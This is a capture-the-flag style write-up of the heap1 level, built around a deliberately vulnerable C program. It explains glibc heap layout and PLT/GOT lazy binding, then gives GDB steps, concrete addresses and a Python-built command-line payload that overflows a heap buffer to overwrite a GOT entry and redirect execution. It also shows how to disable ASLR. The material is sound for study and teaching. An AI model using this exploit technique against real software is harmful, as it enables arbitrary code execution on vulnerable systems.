Level text

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

Intro

This level covers another heap-based vulnerability. Unlike the previous level, which was just an introductory one, this level requires us to use a technique similar to the stack-based buffer overflows from earlier levels to redirect execution of the program to our desired location, the function winner.

The first time I encountered malloc was in an introductory C programming class, and I rarely used it afterwards. I just knew that it allocated memory and returned the address of that allocated space. Although not necessary for solving it, this level made me explore the inner workings and some implementation details of this important function.

malloc and free are two functions used in dynamic memory allocation. malloc is used for allocating memory space and free for deallocating it. It is worth noting that these two functions are not system calls but convenient wrappers around system calls. For example, malloc will use the system calls brk or mmap, depending on the situation, to request more free space from the kernel. Think of them as wrappers which can be (and usually are) implemented differently across different systems, while the general functionality remains the same. You can read more about the inner workings of malloc and heaps in general at [1], which describes the glibc implementation of malloc.

Ok, this level focuses on the heap and not the stack, but what are the differences between the two and what are the implications for our approach to the solution?

The stack is used for static memory allocation and the heap for dynamic allocation. The stack is a LIFO (last in, first out) structure used for storing local variables and keeping track of function calls, with the most recently reserved block always freed first. Managing the stack is trivial, since it only takes incrementing or decrementing a pointer, while heap management is more complex. That complexity follows from its structure: unlike the stack, the heap is not well structured (adjacency of reserved memory is not guaranteed). The heap is a memory space which can be arbitrarily populated by allocations of different sizes, and a subsequent allocation may not be trivial if, for example, there is not enough space left on the heap for the desired amount of memory, in which case additional interaction with the kernel is required.

There is one stack for each existing thread, while the number of heaps can vary from one to many. The number of threads can be much greater than the number of heaps, meaning some threads will share heaps. In the glibc implementation of malloc, the number of so-called "arenas" (I imagine an arena as a heap container which can store multiple heaps, read more at [1]) is determined by the number of processor cores and the architecture (32 bit vs. 64 bit). This means synchronization is needed when threads allocate concurrently on the same heap(s), which slows things down. In contrast, the same stack addresses are usually accessed much more often, so they tend to stay in the processor's cache and access to them is significantly faster. Finally, the stack has a fixed size determined when the thread is created, whereas the heap gets its initial size at application startup and can grow as the application needs it (by asking the kernel for more memory using the aforementioned system calls).

What we know so far is that we need to somehow redirect program execution. The first thing that comes to mind is overwriting the return address of main, but how? We can see from the two strcpy calls in the code above that the first argument is copied to the first structure's name member (its allocated space on the heap, 8 bytes in size) and then the second argument is copied to the space allocated for the second structure's name. If we recall how strcpy works, we know that it copies the byte array given as the second argument to the address given by the first argument, without checking whether there is enough allocated space to accommodate the whole byte array (in this case, one supplied by the user). This is our attack vector.

If we give a sufficiently large input (in this case, larger than 8 bytes) as the first argument, it will cause an overflow on the heap. Let's recall what that means: we had a bunch of calls to malloc, each of which allocates some space on the heap, and then we copy user input to that space. Note that the allocated spaces don't have to be adjacent, because malloc tries to find a sufficiently large space to accommodate the desired number of bytes, and nothing ensures that the space between two subsequent allocations is not occupied by some other allocation that happened earlier. I will go into more detail in the "solution" section of this post.

The main idea behind this attack is to overflow the memory returned by one call to malloc so that the overflowed data overwrites a specific value at some location in another heap allocation returned by a different malloc call. The idea is the same as in the stack-based overflow levels; the only difference is that nothing ensures adjacency of the interesting memory addresses (because we work on the heap and not the stack).

The exploit consists of overflowing the second allocated memory space (specifically the space pointed to by i1->name) into the memory space pointed to by i2, overwriting the value of the i2->name pointer so that it points to an address of our choosing. Since the second strcpy writes the second user-supplied argument to wherever i2->name points, this gives us the ability to write a value we control to a location we control, and with that to redirect program flow. Details of this exploitation will be covered in the next part of this post.
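To make the idea concrete, here is a minimal Python sketch that models the heap as a flat byte array. It is only a toy: the layout (the i1->name buffer sitting 20 bytes before the i2->name member) and the addresses are assumptions borrowed from the GDB session later in this post, and the strcpy and read_u32 helpers are hypothetical stand-ins written for this illustration.

```python
import struct

# Toy model of the heap: a flat bytearray starting at HEAP_BASE.
# The addresses are assumptions taken from the GDB session in this post;
# a real allocator gives no guarantee about this layout.
HEAP_BASE = 0x0804A000
heap = bytearray(0x50)

I1_NAME = 0x0804A018       # buffer returned by the second malloc
I2 = 0x0804A028            # struct internet returned by the third malloc
I2_NAME_BUF = 0x0804A038   # buffer returned by the fourth malloc


def strcpy(memory, dest, src):
    """Copy src plus a terminating NUL to dest, with no bounds check."""
    start = dest - HEAP_BASE
    data = src + b"\x00"
    memory[start:start + len(data)] = data


def read_u32(memory, addr):
    """Read a little-endian 32-bit value stored at addr."""
    return struct.unpack_from("<I", memory, addr - HEAP_BASE)[0]


# What main() sets up for i2 before the two strcpy calls.
struct.pack_into("<II", heap, I2 - HEAP_BASE, 2, I2_NAME_BUF)

# First strcpy: 20 filler bytes reach i2->name, the next 4 replace it.
target = 0x08049774  # puts_GOT as reported in this post
strcpy(heap, I1_NAME, b"A" * 20 + struct.pack("<I", target))

# The second strcpy would now write argv[2] to this address.
overwritten_name = read_u32(heap, I2 + 4)
print(hex(overwritten_name))
```

Note that the filler also tramples the chunk header and the priority field of i2 on its way, which does not matter here because neither is used again before the program prints its final message.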

Solution

Steps for exploitation:

1. Find where i1->name points after memory allocation (where the data will be stored).
2. Find the address of the i2->name character pointer (which we need to overwrite).
3. Find the offset from *(i1->name) to i2->name so we can tailor our input.
4. Find the address of winner (which we need to call).
5. Find the address of the location from which execution will be redirected (the location from which we will bounce our execution to winner).
6. Execute the exploit.

Step 1: using GDB, we first disassemble the binary with disassemble main. Note that the default disassembly syntax is AT&T; to switch to Intel syntax, which is in my opinion more readable, enter the GDB command set disassembly-flavor intel. Find the malloc call that allocates i1->name in the given code (located at (main + 46)) and set a breakpoint on the instruction right after it using the command break *(main + 47). The result of the malloc call, which is the address of the allocated space, will be stored in the EAX register, which we can inspect (after hitting our breakpoint) with the command info registers eax, or i r eax for short. After running the program with the run command, we find that the address of the memory allocated to i1->name is: *(i1->name)@0x095BA018 (address may vary).

Step 2: almost the same as the previous step, except now we need the actual address of the i2->name struct member and not the memory allocated for it. This can be achieved by setting a breakpoint immediately after the malloc call that allocates i2 in the given C code. After finding that call in the disassembly, the breakpoint is set at *(main + 68). This gives us the address of the memory allocated for the internet structure and pointed to by i2, which is: i2@0x095ba028. If we look at the internet structure, we can conclude that the name member (which is of type character pointer) resides 4 bytes after the beginning of the memory allocated for the structure itself, right after the 4-byte priority field, so the address of the name member is: i2->name@0x095ba02c.
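The 4-byte offset of the name member can be double-checked with a small Python sketch using ctypes. This assumes the 32-bit layout of the target binary, so the char pointer is modeled as a 4-byte unsigned integer; the Internet class is a hypothetical mirror of struct internet written for this illustration.

```python
import ctypes


class Internet(ctypes.Structure):
    """32-bit view of struct internet; the pointer is modeled as a uint32."""
    _fields_ = [
        ("priority", ctypes.c_int32),
        ("name", ctypes.c_uint32),  # stands in for a 4-byte char *
    ]


i2_addr = 0x095BA028  # value returned by malloc for i2 in this post
name_member_addr = i2_addr + Internet.name.offset
print(hex(name_member_addr))
```

On a 64-bit build the pointer would be 8 bytes wide and padding would move the member, so the numbers here only apply to the 32-bit binary from the level.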

Step 3: we need to find the offset from the address found in step 1 to the address found in step 2 so we know how many bytes we need to supply via user input. This is done simply by subtracting: 0x095ba02c - 0x095ba018 = 0x14 = 20 bytes. This means the first argument needs 20 bytes of filler to reach the i2->name structure member, and the bytes we write after that will overwrite it. Note that this program is not big and that there is plenty of space on the heap. Although nothing guarantees that subsequent calls to malloc will result in adjacent memory allocations, given the way the heap works (as a doubly linked list of free memory chunks) I can assume that at least the first few allocations could end up adjacent. Let's check with GDB. Setting a breakpoint after the user input is written to the allocated memory, we examine the memory:

Let's analyze the i1 structure. When the structure corresponding to i1 was allocated, malloc returned address 0x804a008, which holds the content of the priority field (set to 1). Just before it, at 0x804a004, is a field holding 0x00000011. This is the chunk's size field: the chunk takes 0x10 = 16 bytes, and the lowest bit is the PREV_INUSE flag (see [1]), which is set and means that the previous chunk is allocated. Because of that, the 0x00000000 bytes starting at address 0x804a000 are treated as user data of the previous chunk rather than as its size (the same goes for the other chunks). We can also see that consecutive malloc calls returned consecutive memory regions starting at: 0x804a008, 0x804a018, 0x804a028, 0x804a038.
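The arithmetic behind this analysis can be sketched in a few lines of Python. The flag mask assumes the glibc convention described in [1], where the three lowest bits of the size field carry flags; decode_size_field is a hypothetical helper name.

```python
PREV_INUSE = 0x1   # lowest bit of the size field
FLAG_MASK = 0x7    # the three lowest bits carry flags, not size


def decode_size_field(field):
    """Split a chunk's size field into (chunk_size, prev_inuse)."""
    return field & ~FLAG_MASK, bool(field & PREV_INUSE)


chunk_size, prev_inuse = decode_size_field(0x00000011)

# Pointers returned by the four malloc calls, as seen in GDB.
user_pointers = [0x804A008, 0x804A018, 0x804A028, 0x804A038]
gaps = [b - a for a, b in zip(user_pointers, user_pointers[1:])]

# Distance from the start of i1->name to the i2->name member.
offset = (user_pointers[2] + 4) - user_pointers[1]
print(chunk_size, prev_inuse, gaps, offset)
```

Each gap equals the chunk size, which is what we would expect when the chunks are laid out back to back, and the offset matches the 20 bytes computed in step 3.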

Step 4: to get the address of winner we can ask GDB for it directly, which gives: winner@0x08048494.

Step 5: this is the address from which the program flow can be redirected. For example, this can be the location of the saved return address (also called saved eip), which, when overwritten with the address of winner, will redirect program flow to winner when the program attempts to return from main. We did this a lot in the stack-based buffer overflow levels. The more reliable way (which I recall doing only a few times before) is to overwrite the GOT (global offset table) entry that the PLT (procedure linkage table) stub of some dynamically linked function from our program (such as printf) jumps through.

A short reminder on how the PLT and GOT work (the details can be found at [2]): when you compile a program that uses a function from some dynamically linked library (for example a printf call), you don't write that function's code yourself because it already exists in a library somewhere on the system. Because the exact address of that function is not known at build time (nobody knows yet where exactly the library will be loaded during execution), a "blank" slot is reserved for the address of that function in the Global Offset Table (GOT). If the GOT were all we had, we might get into trouble: all function addresses would have to be resolved (found) and put into the GOT when the program starts, because we don't know which functions will actually get called and which won't, and that takes time. To solve this problem another level of indirection is implemented in the form of the Procedure Linkage Table (PLT), which is basically just a "trampoline" that triggers the resolution of only those functions we actually call. So when we call printf we don't call printf directly; the corresponding PLT entry is called instead, which is just a small piece of code that jumps through the function's GOT slot and, on the first call, has the address resolved and written to the GOT. This is called the "lazy" approach.
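The lazy approach can be illustrated with a deliberately simplified Python model. This is not how the dynamic linker is implemented: the real PLT stub is machine code, and the LIBC and PLT_RESOLVER addresses below are made up purely as labels. Only the winner address comes from this post.

```python
# Hypothetical addresses, used only as labels in this toy model.
LIBC = {"puts": 0xB7EF0000}   # where the "library" really placed puts
PLT_RESOLVER = 0x080483D2     # stand-in for the stub that invokes the resolver

got = {"puts": PLT_RESOLVER}  # GOT slot before the first call
resolutions = []              # records every trip through the resolver


def call_via_plt(name):
    """Return the address control ends up at when calling name@plt."""
    if got[name] == PLT_RESOLVER:
        # First call: resolve the symbol and patch the GOT slot.
        resolutions.append(name)
        got[name] = LIBC[name]
    return got[name]          # models the indirect jump through the GOT


first = call_via_plt("puts")
second = call_via_plt("puts")

# An attacker with a write primitive can replace the slot instead.
WINNER = 0x08048494
got["puts"] = WINNER
hijacked = call_via_plt("puts")
print(hex(first), hex(second), hex(hijacked), resolutions)
```

The point of the model is the last three lines: the PLT stub blindly jumps to whatever the GOT slot contains, so whoever can write to that slot decides where the next call lands.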

So we are left with two options (two that I know about at least). The first is the address of the saved instruction pointer (the saved return address), which we can get with the GDB command info frame: saved_EIP@0xfff9767c. The other option is to find the address of the GOT entry used by the PLT stub of a known function call, for example printf. In the disassembly we can see that there is no printf call, only a call to puts. This is just a compiler optimization (the printf call prints a constant string ending in a newline, so it is replaced with puts), and the approach still works fine with puts.

As I said before, PLT entries are just small pieces of code, which means we can disassemble them:

So the address we could overwrite is the address the PLT entry for puts will jump to when trying to resolve its address in GOT: puts_GOT@0x08049774.

Step 6: the exploit is executed by providing tailored input as the two command line arguments the program expects. The goal of the first argument is to overflow the i1->name heap buffer into the i2 structure and overwrite the i2->name pointer with either the saved_EIP or the puts_GOT address. The goal of the second argument is simply to provide the address to which execution will be redirected (the address of winner), which the second strcpy then writes to that location.

Generally, exploit could look like this:

./heap1 `python -c 'print "A" * struct_offset + exec_redir_addr + " " + winner_addr'`

Where:

struct_offset = 0x14 = 20 bytes

exec_redir_addr = puts_GOT or saved_EIP (as 4 little-endian bytes)

winner_addr = 0x08048494 (as 4 little-endian bytes)
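As a sketch of how these pieces fit together, the two arguments can be built in Python 3 with struct.pack, which takes care of the little-endian byte order. The addresses are the ones reported in this post and may differ on another machine; build_args is a hypothetical helper name.

```python
import struct

STRUCT_OFFSET = 20        # bytes from i1->name to the i2->name member
PUTS_GOT = 0x08049774     # exec_redir_addr choice used in this post
WINNER_ADDR = 0x08048494


def build_args(redirect_addr, target_addr, offset=STRUCT_OFFSET):
    """Return (argv1, argv2) as raw bytes for the two strcpy calls."""
    argv1 = b"A" * offset + struct.pack("<I", redirect_addr)
    argv2 = struct.pack("<I", target_addr)
    for arg in (argv1, argv2):
        # A NUL byte would end the argument early, so refuse such addresses.
        if b"\x00" in arg:
            raise ValueError("argument contains a NUL byte")
    return argv1, argv2


argv1, argv2 = build_args(PUTS_GOT, WINNER_ADDR)
print(argv1, argv2)
```

On a POSIX system the result could then be handed to the binary with something like subprocess.run([b"./heap1", argv1, argv2]), which avoids shell quoting issues with non-printable bytes.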

Here is proof of work:

NOTE #1: Addresses may vary.

NOTE #2: Although the level can be exploited on the given virtual machine, I wanted to copy the heap1 level to my local Kali machine because I'm more used to it and wanted to exploit it there. That is where I stumbled upon some problems. I tried the saved_EIP exploit method and noticed that each time I started the program using the same exploit from the same directory (so the environment variables would not change) the address of saved_EIP would change. This is because ASLR is enabled by default. To prove this, I temporarily disabled ASLR by editing /proc/sys/kernel/randomize_va_space and changing its value from 2 to 0 (which disables it). After that, the address of saved_EIP no longer changed between consecutive program executions and the exploit was possible.

With the puts_GOT method, the address of the GOT entry was not randomized even with ASLR enabled, although the GOT lives in the data segment, which I expected ASLR to randomize. I did some minor research and found that if the executable is not compiled as PIE (position independent executable) you don't get much benefit from ASLR because not every memory region gets randomized, and I couldn't find out exactly why. My guess is that the PLT couldn't work with everything randomized, as it needs to know the position of the GOT. [3] states that if an executable isn't PIE, it surely doesn't have its text segment randomized, and the same post states that any reference from non-PIC/PIE code to a function from a dynamically linked library needs the PLT for address resolution, because the non-PIC/PIE executable expects function addresses to be static/known (which they are, because the real function call is replaced with the PLT entry address, which is known prior to execution).
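For checking the ASLR setting without opening the file by hand, a small Python sketch like the following could be used. The mode descriptions follow my understanding of the Linux kernel documentation for this sysctl; read_aslr_mode and describe are hypothetical helper names.

```python
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "mode 1 plus heap (brk) randomization",
}


def read_aslr_mode(path="/proc/sys/kernel/randomize_va_space"):
    """Return the integer ASLR mode stored in the given file."""
    with open(path) as handle:
        return int(handle.read().strip())


def describe(mode):
    """Map a mode number to a short human-readable description."""
    return ASLR_MODES.get(mode, "unknown")


print(describe(2))
```

On a Linux machine, describe(read_aslr_mode()) reports the current setting; changing it still requires root privileges.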

References

[1] https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/

[2] https://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/

[3] https://securityetalii.es/2013/02/03/how-effective-is-aslr-on-linux-systems/

Thank you for reading!